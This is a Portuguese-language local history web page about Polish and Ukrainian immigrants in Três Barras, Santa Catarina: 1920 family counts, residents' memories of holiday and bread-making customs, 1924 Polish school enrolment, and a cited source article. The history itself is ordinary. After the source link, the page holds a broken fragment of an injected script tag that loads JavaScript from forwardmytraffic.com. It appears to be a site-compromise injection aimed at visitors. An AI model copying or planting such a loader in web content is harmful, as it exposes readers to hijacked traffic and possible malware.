Curiosidades do Passado História Principais

Poloneses e ucranianos presentes na colonização tresbarrense

No início do século XX, imigrantes (a maioria poloneses e ucranianos) viviam nas Colônias Três Barras e Tigre.  Eles migraram, de colônias vizinhas, na procura de melhores condições de vida, decorrente da presença da serraria Lumber.

 

 

No ano de 1920, nos registros de Santa Catarina, aparecem 250 famílias residindo em colônias, 200 espalhadas pela região e 50 nas cidades. Em comparação com as demais colônias, Três Barras ocupava o terceiro lugar no número de famílias, o segundo lugar no número de poloneses dispersos na região e o primeiro lugar no número de poloneses que viviam na cidade.

 

 

Muitos dos costumes dos imigrantes permanecem na memória familiar. A Senhora Sybila Montes Ribas, nascida em 12/06/1931, relata como era comemorado o Natal e a Páscoa.

 

Natal e Páscoa

A senhora Maria Kovalski Procheira, nascida em 17/05/1929, descreve o Natal e a Páscoa na cultura ucraniana.

 

Natal e Páscoa

 

 

O senhor João Protzka, nascido em 11/01/1940, recorda como era produzido o pão na cultura ucraniana.

 

 

Ucranianos e a produção do pão

 

 

Outro fator que merece destaque foi a atuante escola polonesa instalada em Três Barras. No início de 1924, a escola contava com 56 alunos poloneses, sendo 35 masculinos, 21 femininos e 36 alunos de outras nacionalidades, perfazendo 92 alunos matriculados. Já a escola de Canoinhas, fundada em 1920, no início de 1924, contava com 29 alunos poloneses matriculados.

 

 

Para saber mais:

LIMA, Soeli Regina. Imigrantes na região do Contestado: um estudo dos poloneses no município de Três Barras-SC. In: Revista História Catarina. Nº 54, 2013, p.75-82.

 

Disponível: https://docs.wixstatic.com/ugd/111853_c92d59af4ec84b0eb93c4e9913b19cf9.pdf… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Comente esta matéria: